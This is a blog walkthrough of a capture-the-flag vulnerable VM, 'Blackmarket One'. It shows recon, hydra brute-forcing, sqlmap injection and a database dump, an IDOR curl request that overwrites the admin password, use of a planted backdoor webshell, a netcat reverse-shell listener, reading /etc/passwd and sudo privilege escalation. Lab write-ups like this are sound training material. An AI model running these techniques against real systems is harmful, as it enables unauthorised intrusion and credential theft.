Blackmarket One – Writeup


This machine is,149/

Recon Phase

First I needed to find out what ip address the target was running on, so I fired up Nmap to work it out

root@kali:~# nmap -sn
Nmap scan report for
Host is up (0.00027s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for
Host is up (0.000096s latency).
MAC Address: 08:00:27:89:83:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.00032s latency).
MAC Address: 08:00:27:24:52:72 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

Next I needed an idea of what was running on the server to find potential entries into the system, so I pointed Nmap at it again

root@kali:~# nmap -sV
Nmap scan report for
Host is up (0.00056s latency).
Not shown: 993 filtered ports
21/tcp  open  ftp      vsftpd 3.0.2
22/tcp  open  ssh      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.7 ((Ubuntu))
110/tcp open  pop3     Dovecot pop3d
143/tcp open  imap     Dovecot imapd (Ubuntu)
993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp open  ssl/pop3 Dovecot pop3d
MAC Address: 08:00:27:24:52:72 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Flag Hunting

So next it was time to start hunting for flags, the first thing I did was navigate to in browser

Screenshot 1

First thing I see is a login page, I decided to poke around the html source

Screenshot 2

So that's the first flag,


Part of the flag looks like base64, so I went ahead and decoded it

Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU= : CIA - Operation Treadstone

So I went ahead and googled this, it seemed to be a reference to Jason Bourne, but I wasn't sure how that could help me yet so I decided it was time to point dirbuster over at this

Screenshot 3

Once It finished I inspected the results

Screenshot 4

For a while I dug through these files looking for anything useful, but nothing came to mind with it. So next up I decided to try a wordlist about Jason Bourne and Operation Treadstone. Using cewl I generated a wordlist to use

root@kali:~# cewl -d 0 -m 5 -w bourne.txt

I attempted to use these as logins with rockyou.txt as the password list and plugged them into hydra, but failed to find any login creds

root@kali:~# hydra -L bourne.txt -P /usr/share/wordlists/rockyou.txt ssh
root@kali:~# hydra -L bourne.txt -P /usr/share/wordlists/rockyou.txt ftp

So after messing around for a while, I decided to make a list of the flag words in a wordlist and use it as the passwords

root@kali:~# hydra -L bourne.txt -P flagWords.txt ssh
root@kali:~# hydra -L bourne.txt -P flagWords.txt ftp

This led to me getting credentials for ftp of


So I used the to access the ftp server

root@kali:~# ftp

When it asked for username and password I used nicky:CIA and began to dig around

ftp> ls -la
500 Illegal PORT command.

It seems passive mode is off, so I sorted that out and started digging

ftp> pass
ftp> ls -la
dr-xr-xr-x    4 1002     1002         4096 Nov 06  2017 .
dr-xr-xr-x    4 1002     1002         4096 Nov 06  2017 ..
-rw-r--r--    1 1002     1002          220 Nov 06  2017 .bash_logout
-rw-r--r--    1 1002     1002         3637 Nov 06  2017 .bashrc
drwx------    2 1002     1002         4096 Nov 06  2017 .cache
-rw-r--r--    1 1002     1002          675 Nov 06  2017 .profile
dr-xr-xr-x    3 65534    65534        4096 Nov 06  2017 ftp

A folder called "ftp", I decided to look in and see what i could find

ftp> cd ftp
ftp> ls -la
dr-xr-xr-x    3 65534    65534        4096 Nov 06  2017 .
dr-xr-xr-x    4 1002     1002         4096 Nov 06  2017 ..
drwxr-xr-x    2 1002     1002         4096 Nov 09  2017 ImpFiles

Another directory, so next I went into that

ftp> cd ImpFiles
ftp> ls -la
drwxr-xr-x    2 1002     1002         4096 Nov 09  2017 .
dr-xr-xr-x    3 65534    65534        4096 Nov 06  2017 ..
-rw-r--r--    1 0        0             216 Nov 12  2017 IMP.txt

As there was only a .txt file, I decided to download it and see what was in it

ftp> get IMP.txt

Now I had the file, I closed my ftp connection and wanted to see what was in it

root@kali:~# cat IMP.txt
If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!

Now I had flag 2, I decided to decode it

Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy : Congrats Proceed Further

No helpful hint in this one, the message in IMP.txt was my next clue, "You must find out and hack it!" made me consider a hidden url that dirbuster had failed to find before. So I put together a new wordlist of vehicle workshop related things


I then put these into dirbuster and waited for it to finish

Screenshot 5

A new directory found on /vworkshop, I navigated over to it in browser

Screenshot 6

I decided to try the nicky:CIA on the various login screens available, first on employee login

Screenshot 7

And then on customer

Screenshot 8

But neither of them worked, so I took a look around the pages available, and found the spare parts store, nothing obviously useful yet.

Screenshot 9

Next I attempt to use the employee registration form to create my own account

Screenshot 10

And surprisingly, it worked

Screenshot 11

So I then tried to login with those creds

Screenshot 12

After looking around for a while I wasn't able to find much, so I tried doing this again making a user account this time

Screenshot 13

Screenshot 14

Screenshot 15

So I take a look around here, and see that selling a vehicle has a file upload option, so I attempted to upload /usr/share/webshells/php/simple-backdoor.php

Screenshot 16

And when Submit it

Screenshot 17

But unfortunately I was then unable to trigger the shell to work. So I spent a while playing around as both the user account and the admin account until on the spare parts details container I noticed something interesting. The url contains a parameter of ?sparepartid=[number]. I decided to fire up sqlmap to see if this was exploitable

root@kali:~# sqlmap -u

Screenshot 18

So it is exploitable, I now wanted to dump the whole database

root@kali:~# sqlmap -u --all

This took a while, so I went and made a cup of tea, I also said yes to most of the options I was presented during the execution. Eventually it was finished and I had various bits of information. First there was a table called "flag"

Database: BlackMarket
Table: flag
[1 entry]
| FlagId | name | Information                    |
| 3      | Flag | Find Jason Bourne Email access |

So I now had flag 3 and my next hint. For this, there were 2 seemingly relevant tables

Database: BlackMarket
Table: user
[5 entries]
| userid | access | username | password                                    |
| 1      | 1      | admin    | cf18233438b9e88937ea0176f1311885            |
| 2      | 2      | user     | 0d8d5cd06832b29560745fe4e1b941cf            |
| 4      | 3      | supplier | 99b0e8da24e29e4ccb5d7d76e677c2ac (supplier) |
| 5      | 2      | jbourne  | 28267a2e06e312aee91324e2fe8ef1fd            |
| 6      | 3      | bladen   | cbb8d2a0335c793532f9ad516987a41c            |
Database: BlackMarket
Table: customer
[2 entries]
| userid | contact               | address       | customer_name   |
| 2      |  | Moscow Russia | Dimitri Volkof  |
| 5      |       | Texas         | Jason Bourne    |

So, sqlmap was able to crack the login for supplier, it was supplier:supplier, I headed back to the original login page at and used those creds to login

Screenshot 19

There didn't seem to be much going on here that was useful, so i tried accessing the /admin url we found earlier

Screenshot 20

While looking around this section I came across a section called users, and I had options to edit them. I decided to try and change jbourne's password


The first thing i noted was, when I processed this request i was sent to /admin/edit_customer.php?id=5, we already know admin is user id 1, we may be able to change admins details the same way we changed jbourne's, but first I logged out and tried to login as jbourne

Screenshot 22

Well the contents have changed, but I don't seem to have any new avenues of attack. So I went back to the idea of changing admins password. To start this I first changed the password for jbourne again, but inspected the request

Screenshot 23

I decided to copy this as curl, but adjust it to change id 1 by changing the endpoint to /admin/edit_customer.php?id=1

kali@root:~# curl '' -H 'Host:' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer:' -H 'Cookie: PHPSESSID=ma5rgn6ctacf5j5iib6ds79ql3' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' --data 'name=Jason+Bourne&address=Texas+&'
window.alert('Customer updated successfully!');

It looked like it worked, so I logged out and tried to login with admin:pass, but it failed. I then tried to login with jbourne:pass again, and it turned out I had overwritten the username for admin as well as the password

Screenshot 24

And thats flag 4, flag4{bm90aGluZyBpcyBoZXJl}, as with the previous ones I cracked the hash

bm90aGluZyBpcyBoZXJl : nothing is here

One I clicked okay I was forwarded back to the site, but couldn't find anything new, and as a lot of the previous parts have been helped by the flag, I decided to focus upon "Jason Bourne Email access ?????". My first thought is that this could indicate the password is 5 characters long, and was getting ready to take my wordlists from earlier and filter them for only strings of length 5 But before I did this, I Headed over to /squirrelmail


Before trying to mess around with wordlists, I decided to just try using the literal ????? as the password and tried to login with jbourne:?????

Screenshot 26

An email from putin, I opened it up to take a look

Screenshot 27

Now I have the 5th flag Flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}, which i straight away crack

RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ= : Everything is encrypted

Now I had to spend a while investigating potential methods of encryption that could have been used on the message, until I eventually came across the substitution cipher, which when applied with a key of the alphabet backwards (z...a) gave a result

Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to use PassPass.jpg in order to get access.

First I attempted to access but received a 403, which was a good sign as it indicated the directory did indeed exist, but I would have to dig for files. I started with

Screenshot 31

It was indicated this file would be useful, so I downloaded the file to inspect it with various tools

kali@root:~# file PassPass.jpg
PassPass.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 900x506, frames 3
kali@root:~# binwalk PassPass.jpg
0             0x0             JPEG image data, JFIF standard 1.01
kali@root:~# strings PassPass.jpg
Pass = 5215565757312090656

I trimmed the output here as it was rather long, but what I found was a potential password to use. Next up was finding the backdoor itself. I started to dig on urls, coming across multiple 404 errors

Screenshot 28

Until eventually I tried /backdoor.php, and was presenting with what looked like a 404, but was different from the previous 404 pages

Screenshot 29

The version numbers didn't match among other differences, so I inspected the html source

Screenshot 30

This is when I realised it was a fake error page, and that this was probably the backdoor I had been looking for. In the hidden password field I tried the pass I got from PassPass.jpg of 5215565757312090656 but this didn't work. I then thought back to the flag clue "Everything is encrypted", maybe this includes the password, first I tried converting it to Hex 4861696C4B474220, but that didn't work, so next I tried ASCII and got "HailKGB" which certainly seemed appropriate. When I tried it as the password, it became apparent I had now accessed the backdoor

Screenshot 31

The first thing I did was access flag.txt and got flag6{Um9vdCB0aW1l}, which I then cracked.

Um9vdCB0aW1l : Root time

Root Time

I head over to the exec tab where I find it is a webshell, first i just want to check it works

$ whoami

Okay, so the shell works, now I am looking for a priv esc route. First thing to do is get a list of users

$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
dovecot:x:106:114:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:107:115:Dovecot login user,,,:/nonexistent:/bin/false
libvirt-qemu:x:110:107:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:111:117:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
ftp:x:112:120:ftp daemon,,,:/srv/ftp:/bin/false

So there is a user called dimitri who has /bin/bash access, this looks like the best target for a user to get access to. So I get digging into it

$ cd /home
$ ls -la
drwxr-xr-x  5 root    root    4096 Nov 16  2017 .
drwxr-xr-x 22 root    root    4096 Nov  1  2017 ..
drwxrwxr-x  2 dimitri dimitri 4096 Nov 16  2017 .Mylife
drwxr-xr-x  4 dimitri dimitri 4096 Nov 16  2017 dimitri
dr-xr-xr-x  4 nicky   nicky   4096 Nov  6  2017 nicky

The directory called .Mylife owned by dimitri instantly caught my attention as it looked out of place, so i investigated it further

$ cd .Mylife
$ ls -la
drwxrwxr-x 2 dimitri dimitri 4096 Nov 16  2017 .
drwxr-xr-x 5 root    root    4096 Nov 16  2017 ..
-rw-rw-r-- 1 dimitri dimitri  369 Nov 16  2017 .Secret

Well a file called .Secret is alway interesting I instantly wanted to read it

$ cat .Secret
I have been working on this CIA BlackMarket Project but it seems like I am not doing anything
right for people. Selling drugs and guns is not my business so soon I will quit the job.
About my personal life I am a sharp shooter have two kids but my wife don't like me and I am broke. Food wise I eat everything but DimitryHateApple
I will add more about later!

The phrase "DimitryHateApple" instantly stood out, it was in camel case, which does not make sense in a normal file, this led me to believe it could be the password. Also dimitri was spelt as Dimitry which is different to the user account I saw earlier. So I decided to try it as his password

$ su dimitri

But that gave nothing, I considered there may be and error and it may not have been forwarded, so I try again this time forwarding stderr to stdout

$ su dimitri 2>&1
su: must be run from a terminal

At this point I was sick of using a web terminal. And on the network tab I saw an option to spawn a reverse shell. So I opened another terminal on my kali machine to recieve it

root@kali:~# nc -lp 31337

And back on the network tab of the backdoor I hit the back connect button

/bin/sh: 0: can't access tty; job control turned off

At this point it became apparent I didn't have a full shell, so I utilised a python trick to spawn a nicer one

$ python -c "import pty;pty.spawn('/bin/bash')"

Now I had a better shell I tried to su to dimitri again using DimitryHateApple as the password

www-data@Dimitri:/$ su dimitri
su: Authentication failure

When this failed, I then tried again but with the corrected spelling of Dimitri, so I used DimitriHateApple as the password

www-data@Dimitri:/$ su dimitri

Now I had access as dimitri, I checked what I could now do

dimitri@Dimitri:/$ sudo -l
Matching Defaults entries for dimitri on Dimitri:
  env_reset, mail_badpass,
User dimitri may run the following commands on Dimitri:

This is what I was hoping for as now all it takes is

dimitri@Dimitri:/$ sudo su

With the machine rooted, all that was left to do was collect the final flag

root@Dimitri:/# cd /home
root@Dimitri:/# ls -la
drwx------  2 root root 4096 Nov 12  2017 .
drwxr-xr-x 22 root root 4096 Nov  1  2017 ..
-rw-------  1 root root  286 Nov 16  2017 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  705 Nov  9  2017 THEEND.txt
root@Dimitri:/# cat THEEND.txt

Screenshot 33

And that is the machine completed!

Leave a Reply

Your email address will not be published. Required fields are marked *